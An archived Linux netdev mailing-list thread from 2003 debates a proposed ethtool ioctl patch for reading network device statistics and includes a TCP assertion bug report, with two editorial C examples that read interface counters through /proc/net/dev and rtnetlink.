translation for 32-bit applications running on a 64-bit kernel. > My patch looks like this, and it has zero impact on drivers. It's primary > benefit is to get around adding more ioctls: You gain nothing from this patch, just put it into your drivers. Your patch is even more useless than I thought it was going to be. 
:-) From greearb@candelatech.com Tue Jul 22 23:36:31 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 22 Jul 2003 23:36:39 -0700 (PDT) Received: from grok.yi.org (evrtwa1-ar2-4-33-045-074.evrtwa1.dsl-verizon.net [4.33.45.74]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6N6aVFl004972 for ; Tue, 22 Jul 2003 23:36:31 -0700 Received: from candelatech.com (localhost.localdomain [127.0.0.1]) by grok.yi.org (8.12.8/8.12.8) with ESMTP id h6N6aPm2020944; Tue, 22 Jul 2003 23:36:25 -0700 Message-ID: <3F1E2CE9.2080404@candelatech.com> Date: Tue, 22 Jul 2003 23:36:25 -0700 From: Ben Greear Organization: Candela Technologies User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4) Gecko/20030529 X-Accept-Language: en-us, en MIME-Version: 1.0 To: "David S. Miller" CC: netdev@oss.sgi.com Subject: Re: netdev_ops? References: <3F1E17BC.30100@candelatech.com> <20030722220745.379a73c6.davem@redhat.com> <3F1E1D62.90009@candelatech.com> <20030722230215.284dd270.davem@redhat.com> <3F1E2A00.5080506@candelatech.com> <20030722232719.216d7823.davem@redhat.com> In-Reply-To: <20030722232719.216d7823.davem@redhat.com> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 4228 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: greearb@candelatech.com Precedence: bulk X-list: netdev David S. Miller wrote: > You gain nothing from this patch, just put it into your drivers. I am not writing drivers, I'm trying to write code that works with everything that looks remotely like an ethernet device. Thus, I can make this one change and work with ALL drivers, and not have to corrupt every friggin driver under the sun. And yes, I realize this patch is not adding a new ioctl..that is the whole point. > > Your patch is even more useless than I thought it was going to > be. 
:-) I really hope you mis-understood it :) Note it allows me to get a binary representation of the net_device_stats w/out having to parse /proc/net/dev or figure out the vast complexity of libnetlink. I have plenty of other things that are currently new ioctls that could be handled the same, and thus I could continue to avoid issues with other platforms. Ben -- Ben Greear President of Candela Technologies Inc http://www.candelatech.com ScryMUD: http://scry.wanfear.com http://scry.wanfear.com/~greear From davem@redhat.com Tue Jul 22 23:40:12 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 22 Jul 2003 23:40:15 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6N6eBFl005500 for ; Tue, 22 Jul 2003 23:40:12 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id XAA08608; Tue, 22 Jul 2003 23:37:58 -0700 Date: Tue, 22 Jul 2003 23:37:57 -0700 From: "David S. Miller" To: Patrick McHardy Cc: netdev@oss.sgi.com Subject: Re: [PATCH]: fix no_cong_thresh sysctl Message-Id: <20030722233757.1780042d.davem@redhat.com> In-Reply-To: <3F1D59B4.3080307@trash.net> References: <3F1D59B4.3080307@trash.net> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4229 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Tue, 22 Jul 2003 17:35:16 +0200 Patrick McHardy wrote: > these two patches fix the net.core.no_cong_thresh sysctl, the value > accessed is in fact no_cong. Applied, thanks a lot Patrick. 
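[Editorial aside on the netdev_ops thread above, not part of any archived message.] The text-based path that the thread keeps returning to, reading /proc/net/dev and picking out one interface, can be sketched in user space roughly as follows. This is a minimal sketch under stated assumptions, not code from the thread: struct if_counters and both function names are hypothetical, and the parser assumes the usual layout of sixteen counters after the interface name (eight receive, then eight transmit).

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical container for the few counters this sketch extracts. */
struct if_counters {
    unsigned long long rx_bytes, rx_packets, tx_bytes, tx_packets;
};

/* Parse one line of /proc/net/dev. Returns 0 if the line describes
 * `ifname` and all sixteen counters were read, -1 otherwise. */
int parse_netdev_line(const char *line, const char *ifname,
                      struct if_counters *out)
{
    const char *colon = strchr(line, ':');
    unsigned long long v[16];
    const char *p;
    int i;

    if (colon == NULL)
        return -1;              /* the two header lines carry no colon */
    while (*line == ' ' || *line == '\t')
        line++;                 /* names are right-aligned with spaces */
    if ((size_t)(colon - line) != strlen(ifname) ||
        strncmp(line, ifname, strlen(ifname)) != 0)
        return -1;              /* some other interface */

    p = colon + 1;
    for (i = 0; i < 16; i++) {
        char *end;
        v[i] = strtoull(p, &end, 10);   /* skips leading whitespace */
        if (end == p)
            return -1;          /* fewer fields than assumed */
        p = end;
    }
    out->rx_bytes   = v[0];
    out->rx_packets = v[1];
    out->tx_bytes   = v[8];
    out->tx_packets = v[9];
    return 0;
}

/* Scan the whole file for one interface: the read-everything,
 * find-the-line, parse-it sequence described in the thread. */
int read_netdev_counters(const char *ifname, struct if_counters *out)
{
    char line[512];
    int rc = -1;
    FILE *f = fopen("/proc/net/dev", "r");

    if (f == NULL)
        return -1;              /* e.g. /proc is not mounted */
    while (rc != 0 && fgets(line, sizeof(line), f) != NULL)
        rc = parse_netdev_line(line, ifname, out);
    fclose(f);
    return rc;
}
```

Every query re-reads and re-scans the whole file, so the cost per lookup grows with the number of interfaces. A caller polling many interfaces could read the file once per interval and run parse_netdev_line over each line instead.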
From davem@redhat.com Wed Jul 23 00:03:55 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 23 Jul 2003 00:04:00 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6N73oFl008686 for ; Wed, 23 Jul 2003 00:03:53 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id AAA08737; Wed, 23 Jul 2003 00:01:34 -0700 Date: Wed, 23 Jul 2003 00:01:30 -0700 From: "David S. Miller" To: Ben Greear Cc: netdev@oss.sgi.com Subject: Re: netdev_ops? Message-Id: <20030723000130.3a6a917e.davem@redhat.com> In-Reply-To: <3F1E2CE9.2080404@candelatech.com> References: <3F1E17BC.30100@candelatech.com> <20030722220745.379a73c6.davem@redhat.com> <3F1E1D62.90009@candelatech.com> <20030722230215.284dd270.davem@redhat.com> <3F1E2A00.5080506@candelatech.com> <20030722232719.216d7823.davem@redhat.com> <3F1E2CE9.2080404@candelatech.com> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4230 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Tue, 22 Jul 2003 23:36:25 -0700 Ben Greear wrote: > I am not writing drivers, I'm trying to write code that works with > everything that looks remotely like an ethernet device. Making ethtool interfaces available on every net device is not right, what about the ISDN folks? What if they specifically want ethtool ioctls to fail for their devices? How can one accomplish that after your changes? Answer: You can't. > I can make this one change and work with ALL drivers, and not have > to corrupt every friggin driver under the sun. This is undesirable. Not all network drivers should implement ethtool. 
A certain family of network devices may not want them, and we must provide for this. I don't like your change just as much as I did previously. > Note it allows me to get a binary representation of the net_device_stats > w/out having to parse /proc/net/dev or figure out the vast complexity > of libnetlink. Whatever tools you write which depend upon this will not work on any existing 2.4.x kernel, therefore making their utility basically NIL. > I have plenty of other things that are currently new ioctls that could > be handled the same, and thus I could continue to avoid issues with > other platforms. What is this "other platform" issue? If you add anything new, along the lines of SIOCDEVETHTOOl, it's going to have to go through an entire full review process and in that review process any necessary 32-bit ioctl translation code would get added. From greearb@candelatech.com Wed Jul 23 00:28:34 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 23 Jul 2003 00:28:45 -0700 (PDT) Received: from grok.yi.org (evrtwa1-ar2-4-33-045-074.evrtwa1.dsl-verizon.net [4.33.45.74]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6N7SXFl010546 for ; Wed, 23 Jul 2003 00:28:33 -0700 Received: from candelatech.com (localhost.localdomain [127.0.0.1]) by grok.yi.org (8.12.8/8.12.8) with ESMTP id h6N7SRm2027727; Wed, 23 Jul 2003 00:28:28 -0700 Message-ID: <3F1E391B.80209@candelatech.com> Date: Wed, 23 Jul 2003 00:28:27 -0700 From: Ben Greear Organization: Candela Technologies User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4) Gecko/20030529 X-Accept-Language: en-us, en MIME-Version: 1.0 To: "David S. Miller" CC: netdev@oss.sgi.com Subject: Re: netdev_ops? 
References: <3F1E17BC.30100@candelatech.com> <20030722220745.379a73c6.davem@redhat.com> <3F1E1D62.90009@candelatech.com> <20030722230215.284dd270.davem@redhat.com> <3F1E2A00.5080506@candelatech.com> <20030722232719.216d7823.davem@redhat.com> <3F1E2CE9.2080404@candelatech.com> <20030723000130.3a6a917e.davem@redhat.com> In-Reply-To: <20030723000130.3a6a917e.davem@redhat.com> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 4231 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: greearb@candelatech.com Precedence: bulk X-list: netdev David S. Miller wrote: > On Tue, 22 Jul 2003 23:36:25 -0700 > Ben Greear wrote: > > >>I am not writing drivers, I'm trying to write code that works with >>everything that looks remotely like an ethernet device. > > > Making ethtool interfaces available on every net device is not right, > what about the ISDN folks? What if they specifically want ethtool > ioctls to fail for their devices? How can one accomplish that after > your changes? > > Answer: You can't. In my case, if the net_device can return net_device_stats, then I want it to work. If it can't, -ENOTSUPP is returned. I cannot fathom a reason for this in itself to harm anyone. As you noticed below, existing code would never try this ioctl, and new code can likewise ignore it if it cannot handle the consequences. > Whatever tools you write which depend upon this will not work > on any existing 2.4.x kernel, therefore making their utility > basically NIL. That can be said for every new feature or ioctl. Of course it won't work with older stuff...but it will work with newer stuff, and I'm smart enough to be able to fall back to the less efficient parsing of /proc/net/dev if the ioctls are not supported. Anyone else that cares can write programs just as clever. > What is this "other platform" issue? 
> > If you add anything new, along the lines of SIOCDEVETHTOOl, it's > going to have to go through an entire full review process and in > that review process any necessary 32-bit ioctl translation code > would get added. Yes, and since I am ignorant of that stuff, and have no hardware to test with, then I want to avoid it. I can't imagine I'm the only one. Overloading the ethtool ioctl is one way to avoid that pain..adding a new, similar ioctl would also work, but seems like duplicated effort to me. Since it seems very unlikly that this sort of patch will be accepted in the near future, how _DO_ you want to see new features added that require configuration (and reading) from user space? IOCTLs are easy to add on x86 at least, but maybe you'd prefer some text based proc interface instead? Ben -- Ben Greear President of Candela Technologies Inc http://www.candelatech.com ScryMUD: http://scry.wanfear.com http://scry.wanfear.com/~greear From davem@redhat.com Wed Jul 23 00:36:55 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 23 Jul 2003 00:37:04 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6N7asFl011385 for ; Wed, 23 Jul 2003 00:36:55 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id AAA08887; Wed, 23 Jul 2003 00:34:39 -0700 Date: Wed, 23 Jul 2003 00:34:39 -0700 From: "David S. Miller" To: Ben Greear Cc: netdev@oss.sgi.com Subject: Re: netdev_ops? 
Message-Id: <20030723003439.684de751.davem@redhat.com> In-Reply-To: <3F1E391B.80209@candelatech.com> References: <3F1E17BC.30100@candelatech.com> <20030722220745.379a73c6.davem@redhat.com> <3F1E1D62.90009@candelatech.com> <20030722230215.284dd270.davem@redhat.com> <3F1E2A00.5080506@candelatech.com> <20030722232719.216d7823.davem@redhat.com> <3F1E2CE9.2080404@candelatech.com> <20030723000130.3a6a917e.davem@redhat.com> <3F1E391B.80209@candelatech.com> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4232 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Wed, 23 Jul 2003 00:28:27 -0700 Ben Greear wrote: > In my case, if the net_device can return net_device_stats, then I want it to work. This is not for you to decide. That is the driver author's choice. Also, succeeding for _ANY_ ethtool command is going to give a tool the impression that other basic ethtool commands should work too. Your patch makes many devices give very inconsistent behavior. > Yes, and since I am ignorant of that stuff, and have no hardware to > test with, then I want to avoid it. I can't imagine I'm the > only one. Overloading the ethtool ioctl is one way to avoid that pain..adding > a new, similar ioctl would also work, but seems like duplicated > effort to me. The correct "fix" on the 2.4.x side is to add the appropriate ethtool support to appropriate drivers that lack it and need this interface. It is not your hack and it is not adding a new ioctl. You still haven't said why parsing /proc/dev is so bad, and you even admit that your tool has to fall back to this ANYWAYS. 
> Since it seems very unlikly that this sort of patch will be accepted > in the near future, how _DO_ you want to see new features added that > require configuration (and reading) from user space? I just showed you above how to fix this particular problem. Add ethtool support to the ethernet device in question, and submit this change to jgarzik. It isn't very hard work and things other than your particular need stand to gain from it. My final note: You don't even have the problem you claim to have. Use your brain and 'grep' a little bit, ok? :-) egrep get_stats net/core/rtnetlink.c There it is, exactly what you need and supported on every single kernel out there. From greearb@candelatech.com Wed Jul 23 01:08:55 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 23 Jul 2003 01:09:08 -0700 (PDT) Received: from grok.yi.org (evrtwa1-ar2-4-33-045-074.evrtwa1.dsl-verizon.net [4.33.45.74]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6N88sFl014113 for ; Wed, 23 Jul 2003 01:08:55 -0700 Received: from candelatech.com (localhost.localdomain [127.0.0.1]) by grok.yi.org (8.12.8/8.12.8) with ESMTP id h6N88mm2000430; Wed, 23 Jul 2003 01:08:49 -0700 Message-ID: <3F1E4290.6020303@candelatech.com> Date: Wed, 23 Jul 2003 01:08:48 -0700 From: Ben Greear Organization: Candela Technologies User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4) Gecko/20030529 X-Accept-Language: en-us, en MIME-Version: 1.0 To: "David S. Miller" CC: netdev@oss.sgi.com Subject: Re: netdev_ops? 
References: <3F1E17BC.30100@candelatech.com> <20030722220745.379a73c6.davem@redhat.com> <3F1E1D62.90009@candelatech.com> <20030722230215.284dd270.davem@redhat.com> <3F1E2A00.5080506@candelatech.com> <20030722232719.216d7823.davem@redhat.com> <3F1E2CE9.2080404@candelatech.com> <20030723000130.3a6a917e.davem@redhat.com> <3F1E391B.80209@candelatech.com> <20030723003439.684de751.davem@redhat.com> In-Reply-To: <20030723003439.684de751.davem@redhat.com> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 4233 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: greearb@candelatech.com Precedence: bulk X-list: netdev David S. Miller wrote: > On Wed, 23 Jul 2003 00:28:27 -0700 > Ben Greear wrote: > > >>In my case, if the net_device can return net_device_stats, then I want it to work. > > > This is not for you to decide. That is the driver author's > choice. Is it their choice to participate in the /proc/net/dev output? I want the same info, only in binary format. However, this is a side issue: I am really looking for a flexible way to add new features through some ioctl interface, and these features will act primarily on struct net_device, ie at an abstract layer and independent of the underlying driver. > Also, succeeding for _ANY_ ethtool command is going to give > a tool the impression that other basic ethtool commands should > work too. Your patch makes many devices give very inconsistent > behavior. Only stupid tools...every use of ETHTOOL has to be checked because every driver implements different portions, or none at all. Inconsistent is when ethtool eth0 works when eth0 happens to be an 8139too driver and fails when eth0 is a tulip driver. > The correct "fix" on the 2.4.x side is to add the appropriate ethtool > support to appropriate drivers that lack it and need this interface. > It is not your hack and it is not adding a new ioctl. 
So, you'd accept an identical 30 line patch to *every* network device driver? And what about the ones that support no ethtool at all...would you accept the patch that only supported getting the binary stats? > You still haven't said why parsing /proc/dev is so bad, and you > even admit that your tool has to fall back to this ANYWAYS. I notice slowness when trying to probe 250 interfaces (vlans) very often. And no wonder, considering that to get up to date stats I need to read all of /proc/net/dev, search for the right line, and then parse it. Of course my tool will fall back: I want it to work everywhere...but that doesn't mean it shouldn't run better on newer kernels. > > My final note: You don't even have the problem you claim to have. > Use your brain and 'grep' a little bit, ok? :-) > > egrep get_stats net/core/rtnetlink.c > > There it is, exactly what you need and supported on > every single kernel out there. Yep, I looked through that..and through libnetlink, and the complexity is not worth it. Besides, I have multiple other things that are common to all ethernet and ethernet-like devices, so I need to either add IOCTLs, proc interfaces, or hack ethtool. I can continue to ship my own kernel and/or provide patches, but I would prefer to get the support into the mainline kernel. If you have ideas for how you'd like to see this done, plz tell. If you will never accept such a thing, then I'll ask again in 6 months and hope someone else answers. 
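
[Editorial aside, not part of the archived message.] For readers weighing the "complexity" argument, the rtnetlink route pointed to in this thread can be used without libnetlink. The sketch below is an illustration under stated assumptions rather than anything posted to the list: get_link_stats is a hypothetical name, the code is written against current uapi headers in which the IFLA_STATS attribute carries a struct rtnl_link_stats, and the payload layout on the 2.4.x kernels under discussion may differ.

```c
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <linux/netlink.h>
#include <linux/rtnetlink.h>
#include <linux/if_link.h>

/* Copy the counters of interface `name` into *out.
 * Returns 0 on success, -1 if the link was not found or on error. */
int get_link_stats(const char *name, struct rtnl_link_stats *out)
{
    struct {
        struct nlmsghdr nh;
        struct ifinfomsg ifi;
    } req;
    /* Aligned receive buffer; a dump may span several recv() calls. */
    union { struct nlmsghdr align; char bytes[16384]; } buf;
    struct timeval tv = { 2, 0 };       /* do not block forever */
    int fd, found = -1, done = 0;

    fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_ROUTE);
    if (fd < 0)
        return -1;
    setsockopt(fd, SOL_SOCKET, SO_RCVTIMEO, &tv, sizeof(tv));

    /* Ask the kernel to dump every link (RTM_GETLINK + NLM_F_DUMP). */
    memset(&req, 0, sizeof(req));
    req.nh.nlmsg_len = NLMSG_LENGTH(sizeof(struct ifinfomsg));
    req.nh.nlmsg_type = RTM_GETLINK;
    req.nh.nlmsg_flags = NLM_F_REQUEST | NLM_F_DUMP;
    req.nh.nlmsg_seq = 1;
    req.ifi.ifi_family = AF_UNSPEC;
    if (send(fd, &req, req.nh.nlmsg_len, 0) < 0) {
        close(fd);
        return -1;
    }

    while (!done) {
        struct nlmsghdr *nh;
        int len = (int)recv(fd, buf.bytes, sizeof(buf.bytes), 0);

        if (len <= 0)
            break;                      /* error or timeout */
        for (nh = (struct nlmsghdr *)buf.bytes; NLMSG_OK(nh, len);
             nh = NLMSG_NEXT(nh, len)) {
            struct ifinfomsg *ifi;
            struct rtattr *rta;
            const char *ifname = NULL;
            const void *stats = NULL;
            int alen;

            if (nh->nlmsg_type == NLMSG_DONE ||
                nh->nlmsg_type == NLMSG_ERROR) {
                done = 1;
                break;
            }
            if (nh->nlmsg_type != RTM_NEWLINK)
                continue;

            /* Walk the attributes that follow the ifinfomsg header. */
            ifi = NLMSG_DATA(nh);
            alen = (int)IFLA_PAYLOAD(nh);
            for (rta = IFLA_RTA(ifi); RTA_OK(rta, alen);
                 rta = RTA_NEXT(rta, alen)) {
                if (rta->rta_type == IFLA_IFNAME)
                    ifname = RTA_DATA(rta);
                else if (rta->rta_type == IFLA_STATS &&
                         (size_t)RTA_PAYLOAD(rta) >= sizeof(*out))
                    stats = RTA_DATA(rta);
            }
            if (ifname && stats && strcmp(ifname, name) == 0) {
                memcpy(out, stats, sizeof(*out));
                found = 0;
            }
        }
    }
    close(fd);
    return found;
}
```

A caller would declare a struct rtnl_link_stats, call get_link_stats("eth0", &st), and on a zero return read fields such as st.rx_packets and st.tx_bytes. Because one dump returns every link, a tool watching many interfaces could collect all of them from a single request rather than issuing one query per device.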
-- Ben Greear President of Candela Technologies Inc http://www.candelatech.com ScryMUD: http://scry.wanfear.com http://scry.wanfear.com/~greear From davem@redhat.com Wed Jul 23 01:18:11 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 23 Jul 2003 01:18:18 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6N8I9Fl015026 for ; Wed, 23 Jul 2003 01:18:11 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id BAA08970; Wed, 23 Jul 2003 01:15:51 -0700 Date: Wed, 23 Jul 2003 01:15:51 -0700 From: "David S. Miller" To: Ben Greear Cc: netdev@oss.sgi.com Subject: Re: netdev_ops? Message-Id: <20030723011551.5663a020.davem@redhat.com> In-Reply-To: <3F1E4290.6020303@candelatech.com> References: <3F1E17BC.30100@candelatech.com> <20030722220745.379a73c6.davem@redhat.com> <3F1E1D62.90009@candelatech.com> <20030722230215.284dd270.davem@redhat.com> <3F1E2A00.5080506@candelatech.com> <20030722232719.216d7823.davem@redhat.com> <3F1E2CE9.2080404@candelatech.com> <20030723000130.3a6a917e.davem@redhat.com> <3F1E391B.80209@candelatech.com> <20030723003439.684de751.davem@redhat.com> <3F1E4290.6020303@candelatech.com> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4234 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Wed, 23 Jul 2003 01:08:48 -0700 Ben Greear wrote: > Is it their choice to participate in the /proc/net/dev output? Precisely yes, this is why they have the option of not providing the ->get_stats() method by leaving it set to NULL. > > My final note: You don't even have the problem you claim to have. > > Use your brain and 'grep' a little bit, ok? 
:-) > > > > egrep get_stats net/core/rtnetlink.c > > > > There it is, exactly what you need and supported on > > every single kernel out there. > > Yep, I looked through that..and through libnetlink, and the complexity > is not worth it. Nice cop out. Netlink is the standard method to obtain information about network device, address, and route information. It is even defined by an RFC. We're not going to add a hack to the kernel just because you think netlink is too complex. If it's too complex, you get to live with the text based output. I'll tell you this, the netlink version will work on more systems, even ones that don't have /proc mounted. Your patch duplicates existing functionality (getting network statistics in binary form), so just based upon that I cannot allow your patch. From cedric.gavage@unixtech.be Wed Jul 23 02:24:22 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 23 Jul 2003 02:24:32 -0700 (PDT) Received: from virtual.paginaweb.be (virtual.paginaweb.be [212.3.242.133]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6N9OKFl023505 for ; Wed, 23 Jul 2003 02:24:21 -0700 Received: from unixtech.be (warp-core.skynet.be [195.238.24.200]) (authenticated bits=0) by virtual.paginaweb.be (8.12.9/8.12.9/UnixTech - Niddle v2.5 - abuse@unixtech.be) with ESMTP id h6N9OHZk014614; Wed, 23 Jul 2003 11:24:18 +0200 Message-ID: <3F1E53F7.5000803@unixtech.be> Date: Wed, 23 Jul 2003 11:23:03 +0200 From: Cedric Gavage User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4) Gecko/20030714 Debian/1.3.1-3 StumbleUpon/1.73 X-Accept-Language: en MIME-Version: 1.0 To: "David S. 
Miller" CC: Alan Cox , netdev@oss.sgi.com Subject: Re: [Fwd: kernel 2.4.21] References: <1058634345.22000.2.camel@dhcp22.swansea.linux.org.uk> <20030719191723.0821227f.davem@redhat.com> In-Reply-To: <20030719191723.0821227f.davem@redhat.com> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 4235 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: cedric.gavage@unixtech.be Precedence: bulk X-list: netdev David S. Miller wrote: > >>>Jul 17 06:31:00 fazer kernel: KERNEL: assertion (newsk->state != >>>TCP_SYN_RECV) failed at tcp.c(2229) > > > This one was fixed in 2.4.21 > Still this with 2.4.21 kernel: (intel internet card, driver eepro100) Jul 23 07:25:58 fazer kernel: recvmsg bug: copied 7CB284C0 seq 7CB288AE Jul 23 07:25:58 fazer kernel: KERNEL: assertion (flags&MSG_PEEK) failed at tcp.c(1563) Jul 23 07:25:58 fazer kernel: recvmsg bug: copied 7CB284C0 seq 7CB288AE Jul 23 07:25:58 fazer kernel: KERNEL: assertion (flags&MSG_PEEK) failed at tcp.c(1563) Jul 23 07:25:58 fazer kernel: recvmsg bug: copied 7CB284C0 seq 7CB288AE Jul 23 07:25:58 fazer kernel: KERNEL: assertion (flags&MSG_PEEK) failed at tcp.c(1563) Jul 23 07:25:58 fazer kernel: recvmsg bug: copied 7CB284C0 seq 7CB288AE Jul 23 07:25:58 fazer kernel: KERNEL: assertion (flags&MSG_PEEK) failed at tcp.c(1563) Jul 23 07:25:58 fazer kernel: recvmsg bug: copied 7CB284C0 seq 7CB288AE Jul 23 07:25:58 fazer kernel: KERNEL: assertion (flags&MSG_PEEK) failed at tcp.c(1563) Jul 23 07:25:58 fazer kernel: recvmsg bug: copied 7CB284C0 seq 7CB288AE Jul 23 07:25:58 fazer kernel: KERNEL: assertion (flags&MSG_PEEK) failed at tcp.c(1563) Jul 23 07:25:58 fazer kernel: recvmsg bug: copied 7CB284C0 seq 7CB288AE Jul 23 07:25:58 fazer kernel: KERNEL: assertion (flags&MSG_PEEK) failed at tcp.c(1563) Jul 23 07:25:58 fazer kernel: recvmsg bug: copied 7CB284C0 seq 7CB288AE Jul 23 07:25:58 fazer kernel: 
KERNEL: assertion (flags&MSG_PEEK) failed at tcp.c(1563) Any idea? -- Cedric Gavage http://unixtech.be - http://gavage.com - OpenPGP: 0xED325C64 From davem@redhat.com Wed Jul 23 02:38:01 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 23 Jul 2003 02:38:22 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6N9c1Fl024640 for ; Wed, 23 Jul 2003 02:38:01 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id CAA09160; Wed, 23 Jul 2003 02:35:29 -0700 Date: Wed, 23 Jul 2003 02:35:28 -0700 From: "David S. Miller" To: Cedric Gavage Cc: alan@lxorguk.ukuu.org.uk, netdev@oss.sgi.com Subject: Re: [Fwd: kernel 2.4.21] Message-Id: <20030723023528.76b0f69c.davem@redhat.com> In-Reply-To: <3F1E53F7.5000803@unixtech.be> References: <1058634345.22000.2.camel@dhcp22.swansea.linux.org.uk> <20030719191723.0821227f.davem@redhat.com> <3F1E53F7.5000803@unixtech.be> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4236 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Wed, 23 Jul 2003 11:23:03 +0200 Cedric Gavage wrote: > Still this with 2.4.21 kernel: (intel internet card, driver eepro100) > > Jul 23 07:25:58 fazer kernel: recvmsg bug: copied 7CB284C0 seq 7CB288AE > Jul 23 07:25:58 fazer kernel: KERNEL: assertion (flags&MSG_PEEK) failed at tcp.c(1563) What interesting programs are you running on this system? Are you running and old version of vsftpd? 
